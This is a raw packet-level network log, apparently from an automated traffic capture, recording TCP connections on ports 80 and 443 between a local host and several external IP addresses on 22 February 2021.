                                                                                                                                                Feb 22, 2021 23:44:19.903961897 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.903992891 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.904019117 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.904036045 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.904642105 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.904687881 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.904714108 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.904746056 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.906126022 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.906168938 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.906184912 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.906219006 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.907587051 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.907629013 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.907660961 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.907681942 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.909070969 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.909111023 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.909131050 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.909270048 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.910563946 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.910609007 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.910630941 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.910649061 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.912034035 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.912074089 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.912100077 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.912128925 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.913542032 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.913587093 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.913609028 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.913626909 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.915003061 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.915040970 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.915060997 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.915096045 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.916493893 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.916537046 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.916552067 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.916583061 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.933585882 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.933645964 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.933686018 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.933710098 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.934139967 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.934185982 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.934202909 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.934237957 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.935623884 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.935668945 CET44349770172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:19.935724974 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.935739040 CET49770443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:19.983916998 CET4976280192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:19.984874964 CET4977180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.052973032 CET80497625.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.053201914 CET4976280192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.054058075 CET80497715.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.054306030 CET4977180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.055185080 CET4977180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.123574972 CET80497715.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.123725891 CET80497715.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.123812914 CET4977180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.125344038 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.197921991 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.198065996 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.199160099 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.270299911 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.270349026 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.270497084 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.271405935 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.279068947 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.350382090 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.715362072 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.715387106 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.715399981 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.715415955 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.715429068 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.715441942 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.715454102 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.715670109 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.716310978 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.718318939 CET4976480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:20.721055031 CET4977380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:20.787429094 CET443497725.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.787520885 CET49772443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:20.881138086 CET8049764192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.881293058 CET4976480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:20.889765978 CET8049773192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:20.889983892 CET4977380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:20.890939951 CET4977380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:21.059726000 CET8049773192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.059859037 CET8049773192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.060038090 CET4977380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:21.061419964 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.100497007 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.107460976 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.109539986 CET44349765216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.109730005 CET49765443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.141596079 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.141808987 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.143029928 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.183948040 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.192732096 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.192775011 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.192806005 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.192858934 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.192899942 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.209417105 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.256283045 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.258821011 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.258945942 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.260229111 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.306269884 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.441160917 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.441195965 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.441227913 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.441252947 CET44349774216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.441277027 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.441343069 CET49774443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:21.671416044 CET4976680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.672336102 CET4977580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.729289055 CET8049766104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.729425907 CET4976680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.730179071 CET8049775104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.730340004 CET4977580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.731353998 CET4977580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.789048910 CET8049775104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.896842003 CET8049775104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.897058010 CET4977580192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.899482012 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.936989069 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.955919027 CET44349767104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.955952883 CET44349767104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.956049919 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.956125021 CET49767443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.994633913 CET44349776104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.994796991 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:21.996274948 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:22.052531004 CET44349776104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.052568913 CET44349776104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.052668095 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:22.053195953 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:22.062556982 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:22.109666109 CET44349776104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.118966103 CET44349776104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.227426052 CET44349776104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.227603912 CET49776443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:22.229372025 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.285983086 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.286143064 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.286756992 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.344466925 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.344512939 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.344607115 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.345091105 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.352818966 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.401530981 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.409148932 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.535928965 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.535980940 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.536014080 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.536041021 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.536063910 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.536077023 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.536109924 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.536128998 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.536150932 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.536184072 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.536209106 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.536222935 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.536269903 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.537113905 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.537228107 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.538160086 CET4976980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:22.539236069 CET4977880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:22.592116117 CET8049778172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.592282057 CET4977880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:22.592783928 CET4977880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:22.593204021 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.593234062 CET44349777104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.593264103 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.593285084 CET49777443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:22.600337029 CET8049769172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:22.600419044 CET4976980192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:22.645631075 CET8049778172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.082896948 CET8049778172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.083024025 CET4977880192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.086941004 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.148452044 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.148616076 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.149732113 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.211083889 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.217602015 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.217798948 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.218493938 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.238306999 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.279768944 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.299645901 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786400080 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786447048 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786487103 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786515951 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786554098 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786588907 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.786614895 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786647081 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.786659002 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786673069 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.786688089 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786719084 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.786729097 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786742926 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.786771059 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.786783934 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.787156105 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.787180901 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.787830114 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.787867069 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.787905931 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.815573931 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.815608978 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.815687895 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.815823078 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.815855026 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.815856934 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.815890074 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.815927029 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.816508055 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.816550970 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.816611052 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.817914009 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.817954063 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.817981958 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.818027020 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.819343090 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.819384098 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.819448948 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.820828915 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.820873022 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.820900917 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.820940971 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.822244883 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.822288036 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.822351933 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.823641062 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.823684931 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.823748112 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.825119972 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.825162888 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.825195074 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.825233936 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.826562881 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.826605082 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.826668024 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.848221064 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.848278999 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.848397970 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.848762989 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.848815918 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.848849058 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.848918915 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.850219011 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.850263119 CET44349779172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.850331068 CET49779443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:23.893626928 CET4977180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:23.894962072 CET4978080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:23.962029934 CET80497715.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.962146997 CET4977180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:23.966161013 CET80497805.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:23.966795921 CET4978080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:23.967876911 CET4978080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.039052963 CET80497805.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.039211035 CET80497805.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.039275885 CET4978080192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.042229891 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.110594988 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.110761881 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.111315966 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.181473017 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.181512117 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.182822943 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.183773041 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.190637112 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.258958101 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.650466919 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.650532961 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.650571108 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.650588989 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.650597095 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.650639057 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.650641918 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.650691986 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.650692940 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.650743008 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.650743961 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.650790930 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.650806904 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.650840998 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.651123047 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.653176069 CET4977380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:24.654403925 CET4978480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:24.719398975 CET443497815.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.719494104 CET49781443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:24.817502022 CET8049784192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.817747116 CET4978480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:24.818103075 CET4978480192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:24.821861982 CET8049773192.0.84.247192.168.2.6
